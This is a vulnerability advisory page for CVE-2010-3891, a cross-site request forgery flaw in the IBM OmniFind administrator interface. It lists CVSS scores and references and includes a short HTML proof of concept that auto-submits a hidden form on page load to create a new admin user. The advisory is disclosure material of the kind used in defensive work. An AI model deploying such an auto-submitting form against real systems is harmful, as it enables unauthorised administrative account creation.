IBM OmniFind CSRF Vulnerability

2010.11.15
Credit: Fatih Kilic
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-3891
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

The forms in the administrator interface are not protected against XSRF. The attacker can do any action in the context of the victim. An example attack scenario could be: The attacker creates a malicious website with a prepared form to add a new user, which will be submitted on load. Exploit to add an admin user: <html> <head><title>Some seemingly benign web-site</title></head> <body onLoad="document.forms[0].submit();"> <form method="post" action="http://omnifind-host/ESAdmin/security.do"> <input type="hidden" name="command" value="saveNewUser"/> <input type="hidden" name="user.name" value="joemueller"/> <input type="hidden" name="user.role" value="0"/> <input type="hidden" name="user.allCollections" value="true"/> <input type="hidden" name="apply" value="OK"/> </form> </body> </html>

References:

http://www.vupen.com/english/advisories/2010/2933
http://www.securityfocus.com/bid/44740
http://www.securityfocus.com/archive/1/archive/1/514688/100/0/threaded
http://www.osvdb.org/69083
http://www.exploit-db.com/exploits/15473
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top